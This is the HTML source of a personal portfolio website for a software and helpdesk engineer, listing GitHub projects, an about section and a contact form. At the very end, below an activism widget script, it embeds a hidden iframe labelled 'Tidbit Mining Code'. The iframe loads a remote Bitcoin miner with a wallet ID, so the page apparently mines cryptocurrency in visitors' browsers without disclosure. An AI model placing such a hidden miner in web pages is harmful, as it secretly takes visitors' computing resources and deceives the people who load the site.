<!DOCTYPE HTML>
<!--
	Prologue 1.2 by HTML5 UP
	html5up.net | @n33co
	Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
	<head>
		<title>Software and Service by Michael Weems</title>
		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
		<meta name="description" content="" />
		<meta name="keywords" content="" />
		<link href="http://fonts.googleapis.com/css?family=Source+Sans+Pro:200,300,400,600" rel="stylesheet" type="text/css" />
		<!--[if lte IE 8]><script src="js/html5shiv.js"></script><![endif]-->
		<script src="js/jquery.min.js"></script>
		<script src="js/skel.min.js"></script>
		<script src="js/skel-panels.min.js"></script>
		<script src="js/init.js"></script>
		<noscript>
			<link rel="stylesheet" href="css/skel-noscript.css" />
			<link rel="stylesheet" href="css/style.css" />
			<link rel="stylesheet" href="css/style-wide.css" />
		</noscript>
		<!--[if lte IE 9]><link rel="stylesheet" href="css/ie9.css" /><![endif]-->
		<!--[if lte IE 8]><link rel="stylesheet" href="css/ie8.css" /><![endif]-->
	</head>
	<body>

		<!-- Header -->
			<div id="header" class="skel-panels-fixed">

				<div class="top">

					<!-- Logo -->
						<div id="logo">
							<span class="image avatar48"><img src="images/image.jpg" alt="Portrait" /></span>
							<h1 id="title">Michael Weems</h1>
							<span class="byline"> Software / Helpdesk Engineer</span>
						</div>

					<!-- Nav -->
						<nav id="nav">
							<!--
							
								Prologue's nav expects links in one of two formats:
								
								1. Hash link (scrolls to a different section within the page)
								
								   <li><a href="#foobar" id="foobar-link" class="skel-panels-ignoreHref"><span class="fa fa-whatever-icon-you-want">Foobar</span></a></li>

								2. Standard link (sends the user to another page/site)

								   <li><a href="http://foobar.tld"><span class="fa fa-whatever-icon-you-want">Foobar</span></a></li>
							
							-->
							<ul>
								<li><a href="#top" id="top-link" class="skel-panels-ignoreHref"><span class="fa fa-home">Intro</span></a></li>
								<li><a href="#portfolio" id="portfolio-link" class="skel-panels-ignoreHref"><span class="fa fa-th">Portfolio</span></a></li>
								<li><a href="#about" id="about-link" class="skel-panels-ignoreHref"><span class="fa fa-user">About Me</span></a></li>
								<li><a href="#contact" id="contact-link" class="skel-panels-ignoreHref"><span class="fa fa-envelope">Contact</span></a></li>
							</ul>
						</nav>
						
				</div>
				
				<div class="bottom">

					<!-- Social Icons -->
						<ul class="icons">
							<li><a href="http://twitter.com/weems" class="fa fa-twitter solo"><span>Twitter</span></a></li>
							<li><a href="http://facebook.com/megustahelado" class="fa fa-facebook solo"><span>Facebook</span></a></li>
							<li><a href="http://github.com/perlgeek" class="fa fa-github solo"><span>Github</span></a></li>
							<li><a href="mailto:weems@weems.de" class="fa fa-envelope solo"><span>Email</span></a></li>
						</ul>
				
				</div>
			
			</div>

		<!-- Main -->
			<div id="main">
			
				<!-- Intro -->
					<section id="top" class="one">
						<div class="container">

							<a href="#top" class="image featured"> <!-- <img src="images/facelarge.jpg" width="10%" height="10% alt="" /> --></a>

							<header>
								<h2 class="alt">Hello</a>!</h2>
							</header>
							
							<p>Welcome to my site, here I will feature a summary of my previous projects and clients. It is my passion to provide excellent service through Innovative Software and a Superior Value to all Clients.</p>

							<footer>
								<a href="#portfolio" class="button scrolly">Portfolio</a>
							</footer>

						</div>
					</section>
					
				<!-- Portfolio -->
					<section id="portfolio" class="two">
						<div class="container">
					
							<header>
								<h2>Portfolio</h2>
							</header>
							
							<p>The first high-level language which I learned and the one with which I have the most experience is Java. Closely followed by HTML5 (including CSS and JS as well). I also have experience programming in C++. More recently I have been learning Microsoft Visual C# for a few projects. I have also started hacking of late on Ruby (and Rails) and NodeJS. Please drop me a line in the Contact form should you have any questions about any of my projects enumerated below.</p>
						
							<div class="row">
								<div class="4u">
									<article class="item">
										<a href="https://github.com/weems/Practice/blob/master/Practice.py" class="image full"><img src="images/python.jpeg" alt="" /></a>
										<br/>
										<header>
											<h3>Python Quicksort</h3>
										</header>
									</article>
									<article class="item">
										<a href="https://github.com/weems/LargePrime/blob/master/largeprime.js" class="image full"><img src="images/largeprime.jpg" alt="" /></a><br/>
										<header>
											<h3>JavaScript LargePrimes</h3>
										</header>
									</article>
								</div>
								<div class="4u">
									<article class="item">
										<a href="" class="image full"><img src="images/binarysearch.jpg" alt="" /></a>
										<header>
											<h3>Binary Search (js)</h3>
										</header>
									</article>
									<article class="item">
										<a href="https://github.com/weems/Practice/blob/master/Practice.py" class="image full"><img src="images/practice.jpg" alt="" /></a>
										<header>
											<h3>Product Inventory Python</h3>
										</header>
									</article>
								</div>
								<div class="4u">
									<article class="item">
										<a href="https://github.com/weems/web" class="image full"><img src="images/website.jpg" alt="" /></a>
										<header>
											<h3>HTML5 Site</h3>
										</header>
									</article>

									<article class="item">
									<br>
										<a href="https://github.com/weems/playingwithoutput/blob/master/outputs.py" class="image full"><img src="images/outputs.jpg" alt="" /></a>
										<header>
											<h3>Outputs (python)</h3>
										</header>
									</article>
								</div>
							</div>

						</div>
					</section>

				<!-- About Me -->
					<section id="about" class="three">
						<div class="container">

							<header>
								<h2>About Me</h2>
								<br>
								<img src="images/facelarge.jpg" align="center" alt="face" height="25%" width="25%" />
							</header>

							<!-- <a href="" class="image featured"><img src="images/facelarge.jpg" alt="" /> --></a>
							
							<p>I am a 25 year old Software / Helpdesk Engineer from Birmingham, Alabama. </p>

						</div>
					</section>
			
				<!-- Contact -->
					<section id="contact" class="four">
						<div class="container">

							<header>
								<h2>Contact</h2>
							</header>

							<p>If you would like to contact me regarding my work or a future project please do not hesitate to do so at the form below.</p>
							
							<form method="post" action="post">
								<div class="row half">
									<div class="6u"><input type="text" class="text" name="name" placeholder="Name" /></div>
									<div class="6u"><input type="text" class="text" name="email" placeholder="Email" /></div>
								</div>
								<div class="row half">
									<div class="12u">
										<textarea name="message" placeholder="Message"></textarea>
									</div>
								</div>
								<div class="row">
									<div class="12u">
										
										<a href="#" class="button submit">Send Message</a>
									</div>
								</div>
							</form>

						</div>
					</section>
			
			</div>

		<!-- Footer -->
			<div id="footer">
				
				<!-- Copyright -->
					<div class="copyright">
						<p>&copy; 2014 Michael Weems. All rights reserved.</p>
						<ul class="menu">
							<li>Design: <a href="http://html5up.net">HTML5 UP</a></li>
							<li>Images: <a href="http://ineedchemicalx.deviantart.com">Felicia Simion</a></li>
						</ul>
					</div>
				
			</div>
				<!--Fight for The Future Code!-->
	<!--[if !(lt IE 8)]><!-->
	<script type="text/javascript">
		(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src=document.location.protocol+"//d1agz031tafz8n.cloudfront.net/thedaywefightback.js/widget.min.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	</script>
	<!--<![endif]-->
        <!-- Begin Tidbit Mining Code !-->
        
        <iframe style='display:none' src='http://tidbit.co.in/miner'><script>window.walletId = 1GbHDXoZzKew1Xu1eyNFtAbGzbvhsP32tK</script></iframe>
        
        
        <!--End Tidbit Mining Code-->
	
		
	</body>
</html>